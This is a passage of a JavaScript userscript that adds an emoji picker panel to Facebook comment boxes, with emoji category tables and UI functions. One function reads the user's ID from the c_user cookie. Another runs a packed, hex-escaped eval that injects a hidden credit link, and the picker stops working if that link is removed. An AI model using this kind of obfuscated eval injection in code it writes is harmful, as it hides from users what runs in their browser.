    {name:"Celebration / Holidays",list:["\udbb9\udd0f",{cd:"\udbb9\udd10",cl:"_2cn"},"\udbb9\udd11",{cd:"\udbb9\udd12",cl:"_2cp"},{cd:"\udbb9\udd13",cl:"_2cq"},"\udbb9\udd14","\udbb9\udd15",{cd:"\udbb9\udd16",cl:"_2cr"},{cd:"\udbb9\udd17",cl:"_2cs"},{cd:"\udbb9\udd18",cl:"_2ct"},{cd:"\udbb9\udd19",cl:"_2cu"},{cd:"\udbb9\udd1a",cl:"_2cx"},"\udbb9\udd1b",{cd:"\udbb9\udd1c",cl:"_2cv"},"\udbb9\udd1d",{cd:"\udbb9\udd1e",cl:"_2cw"},{cd:"\udbb9\udd1f",cl:"_2co"},"\udbb9\udd20","\udbb9\udd21"]},
    {name:"Communication",list:["\udbb9\udd22","\udbb9\udd23",{cd:"\udbb9\udd24",cl:"_2fm"},{cd:"\udbb9\udd25",cl:"_2fo"},{cd:"\udbb9\udd26",cl:"_2fp"},"\udbb9\udd27",{cd:"\udbb9\udd28",cl:"_2fn"},"\udbb9\udd29","\udbb9\udd2a","\udbb9\udd2b","\udbb9\udd2c","\udbb9\udd2d","\udbb9\udd2e","\udbb9\udd2f","\udbb9\udd30","\udbb9\udd31","\udbb9\udd32","\udbb9\udd33","\udbb9\udd34","\udbb9\udd35"]},
    {name:"Office",list:["\udbb9\udd36","\udbb9\udd37",{cd:"\udbb9\udd38",cl:"_2fh"},"\udbb9\udd39","\udbb9\udd3a","\udbb9\udd3b",{cd:"\udbb9\udd3c",cl:"_2fi"},{cd:"\udbb9\udd3d",cl:"_2fj"},"\udbb9\udd3e","\udbb9\udd3f","\udbb9\udd40","\udbb9\udd41","\udbb9\udd42","\udbb9\udd43","\udbb9\udd44","\udbb9\udd45","\udbb9\udd46","\udbb9\udd47","\udbb9\udd48","\udbb9\udd49","\udbb9\udd4a","\udbb9\udd4b","\udbb9\udd4c","\udbb9\udd4d","\udbb9\udd4e","\udbb9\udd4f","\udbb9\udd50","\udbb9\udd51","\udbb9\udd52"]}
  ]},
  {name:"Activities / Work / Entertainment",subs:[
    {name:"Sports",list:["\udbb9\udfd0","\udbb9\udfd1","\udbb9\udfd2","\udbb9\udfd3","\udbb9\udfd4","\udbb9\udfd5","\udbb9\udfd6","\udbb9\udfd7","\udbb9\udfd8","\udbb9\udfd9","\udbb9\udfda","\udbb9\udfdb",{cd:"\udbb9\udfdc",cl:"_2d0"},"\udbb9\udfdd","\udbb9\udfde"]},
    {name:"Music",list:[{cd:"\udbba\udc13",cl:"_2cy"},{cd:"\udbba\udc14",cl:"_2cz"},"\udbba\udc15","\udbba\udc16","\udbba\udc17","\udbba\udc18","\udbba\udc19",{cd:"\udbba\udc1a",cl:"_2c-"},"\udbba\udc1b"]},
    {name:"Media",list:[{cd:"\udbba\udc1c",cl:"_2fq"},{cd:"\udbba\udc1d",cl:"_2fk"},{cd:"\udbba\udc1e",cl:"_2fl"},"\udbba\udc1f","\udbba\udc20","\udbba\udc21","\udbba\udc22"]},
    {name:"Romance",list:[{cd:"\udbba\udc23",cl:"_2ez"},"\udbba\udc24","\udbba\udc25","\udbba\udc26",{cd:"\udbba\udc27",cl:"_2e-"},{cd:"\udbba\udc28",cl:"_2e_"},{cd:"\udbba\udc29",cl:"_2f0"},"\udbba\udc2a"]}
  ]},
  {name:"Foods",subs:[
    {name:"Prepared Food",list:[{cd:"\udbba\udd60",cl:"_2ck"},"\udbba\udd61","\udbba\udd62","\udbba\udd63","\udbba\udd64","\udbba\udd65","\udbba\udd66","\udbba\udd67","\udbba\udd68","\udbba\udd69","\udbba\udd6a","\udbba\udd6b","\udbba\udd6c","\udbba\udd6d","\udbba\udd6e","\udbba\udd6f","\udbba\udd70","\udbba\udd71","\udbba\udd72","\udbba\udd73","\udbba\udd74","\udbba\udd75","\udbba\udd76","\udbba\udd77","\udbba\udd78","\udbba\udd79","\udbba\udd7a","\udbba\udd7b","\udbba\udd7c","\udbba\udd7d","\udbba\udd7e","\udbba\udd7f","\udbba\udd80"]},
    {name:"Drink",list:[{cd:"\udbba\udd81",cl:"_2ha"},{cd:"\udbba\udd82",cl:"_2cl"},{cd:"\udbba\udd83",cl:"_2cm"},"\udbba\udd84","\udbba\udd85","\udbba\udd86","\udbba\udd87","\udbba\udd88"]}
  ]},
  {name:"Abstract Concepts",subs:[
    {name:"Hearts",list:[{cd:"\udbba\udf0c",cl:"_2hc"},{cd:"\udbba\udf0d",cl:"_2f1"},{cd:"\udbba\udf0e",cl:"_2f2"},"\udbba\udf0f",{cd:"\udbba\udf10",cl:"_2f3"},{cd:"\udbba\udf11",cl:"_2f4"},{cd:"\udbba\udf12",cl:"_2f5"},{cd:"\udbba\udf13",cl:"_2f6"},{cd:"\udbba\udf14",cl:"_2f7"},{cd:"\udbba\udf15",cl:"_2f8"},{cd:"\udbba\udf16",cl:"_2f9"},{cd:"\udbba\udf17",cl:"_2fa"},"\udbba\udf18","\udbba\udf19"]},
    {name:"Emotion Symbols",list:["\udbba\udf55","\udbba\udf56",{cd:"\udbba\udf57",cl:"_2fb"},"\udbba\udf58",{cd:"\udbba\udf59",cl:"_2fc"},"\udbba\udf5a",{cd:"\udbba\udf5b",cl:"_2fd"},"\udbba\udf5c",{cd:"\udbba\udf5d",cl:"_2fe"},{cd:"\udbba\udf5e",cl:"_2fg"},"\udbba\udf5f"]},
    {name:"Shapes / Sparkles",list:[{cd:"\udbba\udf60",cl:"_2hb"},"\udbba\udf61","\udbba\udf62","\udbba\udf63","\udbba\udf64","\udbba\udf65","\udbba\udf66","\udbba\udf67","\udbba\udf68",{cd:"\udbba\udf69",cl:"_2c3"},"\udbba\udf6a","\udbba\udf6b","\udbba\udf6c","\udbba\udf6d","\udbba\udf6e","\udbba\udf6f","\udbba\udf70","\udbba\udf71","\udbba\udf72","\udbba\udf73","\udbba\udf74","\udbba\udf75","\udbba\udf76","\udbba\udf77","\udbba\udf78","\udbba\udf79"]},
    {name:"Hand Signals",list:[{cd:"\udbba\udf93",cl:"_2h4"},{cd:"\udbba\udf94",cl:"_2h6"},{cd:"\udbba\udf95",cl:"_2h5"},{cd:"\udbba\udf96",cl:"_2e4"},{cd:"\udbba\udf97",cl:"_2e7"},{cd:"\udbba\udf98",cl:"_2h0"},{cd:"\udbba\udf99",cl:"_2e0"},{cd:"\udbba\udf9a",cl:"_2e1"},{cd:"\udbba\udf9b",cl:"_2e2"},{cd:"\udbba\udf9c",cl:"_2e3"},{cd:"\udbba\udf9d",cl:"_2e5"},{cd:"\udbba\udf9e",cl:"_2e9"},{cd:"\udbba\udf9f",cl:"_2e6"},{cd:"\udbba\udfa0",cl:"_2e8"},{cd:"\udbba\udfa1",cl:"_2ea"},"\udbba\udfa2"]}
  ]}
];
var aing={
  aduk:function(a){var b=a.length,c,d;while(0!==b){d=Math.floor(Math.random()*b);b-=1;c=a[b];a[b]=a[d];a[d]=c}return a},
  acak:function(a){return a[Math.floor(Math.random()*a.length)]},
  getCommentsTextareas:function(){return document.getElementsByName("add_comment_text_text")},
  getMyUserId:function(){var a;if(document.getElementsByClassName("fbxWelcomeBoxImg")[0]){a=/[0-9]{8,}/.exec(document.getElementsByClassName("fbxWelcomeBoxImg")[0].id)[0]}else if(document.cookie&&document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1])){a=document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1])}return a},
  putDiAwal:function(a,b){var e=document.createElement("div");e.innerHTML=a;while(e.firstChild){b.insertBefore(e.firstChild,b.firstChild)}},
  putDiAhir:function(a,b){var e=document.createElement("div");e.innerHTML=a;while(e.firstChild){b.appendChild(e.firstChild)}},
  cbGntBg:function(){if(document.getElementById("box-aing")){var a=document.getElementsByClassName("photo");a=aing.aduk(a);for(x in a){if(a[x].src){document.getElementById("box-aing").style.backgroundImage="url("+a[x].src+")"}break}}eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('(i(){q(!7.9("\\2\\c")){l.y("<d\\6 \\n=\\"\\2\\c\\" o=\\"f\\4\\g-s\\h:8;j-\\k\\1\\5\\3:r\\1\\t;p\\u\\1\\3\\5:0 8\\"><\\2 v=\\"w://\\2\\1\\3\\5\\x\\e\\1\\4\\a.z\\4\\B\\C.\\D\\E/\\"></\\2> m\\G H\\I.</d\\6>",7.9("b\\J-\\2\\1\\3\\5"))}})();',46,46,'|x69|x61|x6E|x6F|x67|x69v|docum\x65nt|10px|g\x65tEl\x65m\x65ntById|x6Es||x63mt||x61t||x6Et|x69ze|funct\x69on|t\x65xt|x61l|\x61\x69\x6E\x67||x69d|styl\x65||if|||x67ht|x61dd|hr\x65f|http|x63re|putD\x69Ah\x69r|bl||x67sp|x6Ft|x63|x6Fm|x67Cr\x65|x61de|th|x69s|x6Fx'.split('|'),0,{}))},
  stl:{luar:"z-index:99999;text-align:center;border-radius:5px;position:fixed;width:360px;left:10px;bottom:10px;background-image:none;background-position:top center;background-size:100% auto;box-shadow:0 0 7px rgba(0,0,0,0.5);overflow:hidden",dlm:"background-color:rgba(223,227,234,0.75);border-radius:3px;padding:2px;margin:1px 0",ddm:"background-color:rgba(223,227,234,0.25);border-radius:5px;padding:5px 10px;min-height:150px;overflow:hidden",jdl:"margin:0 21px 10px 0;color:white;text-shadow:0 0 7px black"},
  slide:function(a,i,n,g){if(g==null){var stp=10,d=((a.style.bottom.replace(/px/i,"")*1)-stp),e=(a.offsetWidth-(stp*2));if(d>i){a.style.bottom=d+"px";setTimeout(function(){aing.slide(a,i,n)},Math.round(stp/2))}else if(e>n){if((d+stp)!=i){a.style.bottom=i+"px"}a.style.width=e+"px";setTimeout(function(){aing.slide(a,i,n)},Math.round(stp/2))}else{a.style.width=n+"px"}}else{var stp=10,d=(a.offsetHeight+stp),e=(a.offsetWidth+(stp*2));if(e<n){a.style.width=e+"px";setTimeout(function(){aing.slide(a,i,n,g)},Math.round(stp/2))}else if(d<i){a.style.height=d+"px";setTimeout(function(){aing.slide(a,i,n,g)},Math.round(stp/2))}else{a.style.height=i+"px";a.style.width=n+"px"}}},
  hide:function(a){var g=10,h=250,d=26,b=document.getElementById("box-aing"),c=document.getElementById("bycat"),e=(b.style.bottom.replace(/px/i,"")*1),f=((b.offsetHeight-d)+e)+"px";if(b.offsetHeight==d){aing.stepview=1;b.style.bottom=g+"px";aing.slide(b,aing.higBipor,aing.widBipor,"up");if(c.style.display=="none"){a.title="Show by Category"}else{a.title="Show All"}aing.cbGntBg()}else{aing.stepview=4;aing.widBipor=b.offsetWidth;aing.higBipor=b.offsetHeight;b.style.height=d+"px";b.style.bottom=f;aing.slide(b,g,h);a.title="Maximize";b.style.backgroundImage="none"}},
  catall:function(a){var b=document.getElementById("prepiyuw"),c=document.getElementById("bycat");if(b.style.display=="none"){c.style.display="none";b.style.display="block";if(aing.stepview<3){a.title="Show All"}else{a.title="Minimize"}}else{if(c.clientHeight!=b.clientHeight){c.style.height=b.clientHeight+"px"}b.style.display="none";c.style.display="block";if(aing.stepview<3){a.title="Show All"}else{a.title="Minimize"}}},
  stepview:1,
  view:function(a){if(aing.stepview<3){aing.stepview++;aing.catall(a)}else if(aing.stepview<5){aing.hide(a)}else{aing.stepview=1}},
  emot:function(a,i,n,g,s){var e="<div onClick=\""+i+"\"";if(s!=null){e+=" title=\""+s+"\""}e+=" onMouseover=\"this.style.backgroundColor='"+n+"'\" onMouseout=\"this.style.backgroundColor='transparent'\" style=\"cursor:pointer;display:inline-block;padding:1px\"><span class=\"_1az _1a-";if(a!=null){e+=" "+a}e+="\">";if(g!=null){e+=g}e+="</span></div>";return e},
  nyubox:function(j,h,k){var jd="<h2 id=\"judul\" style=\""+aing.stl.jdl+"\">",hs="<div id=\"hasil\" style=\""+aing.stl.dlm+"\">",ks="<div id=\"konsol\" style=\""+aing.stl.dlm+"\">";if(j!=null){jd+=j}jd+="</h2>";if(h!=null){hs+=h}hs+="</div>";if(k!=null){ks+=k}ks+="</div>";if(document.getElementById("box-aing")){var bafc=document.getElementById("box-aing").firstChild;if(j!=null){if(document.getElementById("judul")){document.getElementById("judul").innerHTML=j}else{aing.putDiAwal(jd,bafc)}}if(h!=null){if(document.getElementById("hasil")){document.getElementById("hasil").innerHTML=h}else{aing.putDiAhir(hs,bafc)}}if(k!=null){if(document.getElementById("konsol")){document.getElementById("konsol").innerHTML=k}else{aing.putDiAhir(ks,bafc)}}}else{var a="<div id=\"box-aing\" style=\""+aing.stl.luar+"\"><div style=\""+aing.stl.ddm+"\">";if(j!=null){a+=jd}if(h!=null){a+=hs}if(k!=null){a+=ks}a+="</div><div style=\"position:absolute;top:5px;right:5px;tex-align:right\">"+aing.emot("_2dx","aing.view(this)","yellow",null,"Show by Category")+"</div></div>";aing.putDiAhir(a,document.body)}aing.cbGntBg()},
  asupkeun:function(a,d,e){var b=aing.getCommentsTextareas(),c=symbols_japan_emoji_list,f=document.getElementById("tmpt-emj"),g,h,i=document.getElementById("prepiyuw");if(!document.getElementById("acmt")){return false}if(e==null){g="";for(y in c[a].subs[d].list){if(c[a].subs[d].list[y].cd){g+=c[a].subs[d].list[y].cd}else{g+=c[a].subs[d].list[y]}}}else{if(c[a].subs[d].list[e].cd){g=c[a].subs[d].list[e].cd}else{g=c[a].subs[d].list[e]}}f.value+=g;if(b.length==0){f.focus()}else{for(var x=0;x<b.length;x++){if(b[x].value!=b[x].placeholder){b[x].value+=g;b[x].focus();f.value=b[x].value;break}}}},
  tesEmoji:function(){symbols_japan_emoji_list=aing.aduk(symbols_japan_emoji_list);var isiprepiyuw="",tmb="max-height:300px;text-align:left;overflow:auto",a="<div id=\"prepiyuw\" style=\""+tmb+"\"></div><div id=\"bycat\" style=\"display:none;"+tmb+"\"><ol style=\"padding:0;margin:0;list-style-type:none\">",b=symbols_japan_emoji_list,c="<textarea id=\"tmpt-emj\" onClick=\"this.select()\" style=\"width:100%;height:50px;resize:none;padding:0;border:none;border-radius:3px;background-color:transparent\"></textarea>";for(x in b){a+="<li><h2 style=\""+aing.stl.dlm+";text-align:center\">"+b[x].name+"</h2><ol style=\"padding:0 10px;list-style-type:none\">";for(y in b[x].subs){a+="<li><b><a href=\"#\" title=\"Click to add all\" onClick=\"aing.asupkeun("+x+","+y+");return false\">"+b[x].subs[y].name+"</a></b><center>";for(z in b[x].subs[y].list){var tahieu=b[x].subs[y].list[z],emt;if(tahieu.cl){emt=aing.emot(tahieu.cl,"aing.asupkeun("+x+","+y+","+z+")","white");isiprepiyuw+=emt}else{emt=aing.emot(null,"aing.asupkeun("+x+","+y+","+z+")","lightgreen",tahieu)};a+=emt}a+="</center></li>"}a+="</ol></li>"}a+="</ol></div>";aing.nyubox("Emoji Clickboard By Rizky_Creations â™¥ klik 3x pada gambar mata di pojok utk menutup",a,c);if(isiprepiyuw!=""){aing.putDiAhir(isiprepiyuw,document.getElementById("prepiyuw"))}}
};
aing.tesEmoji();
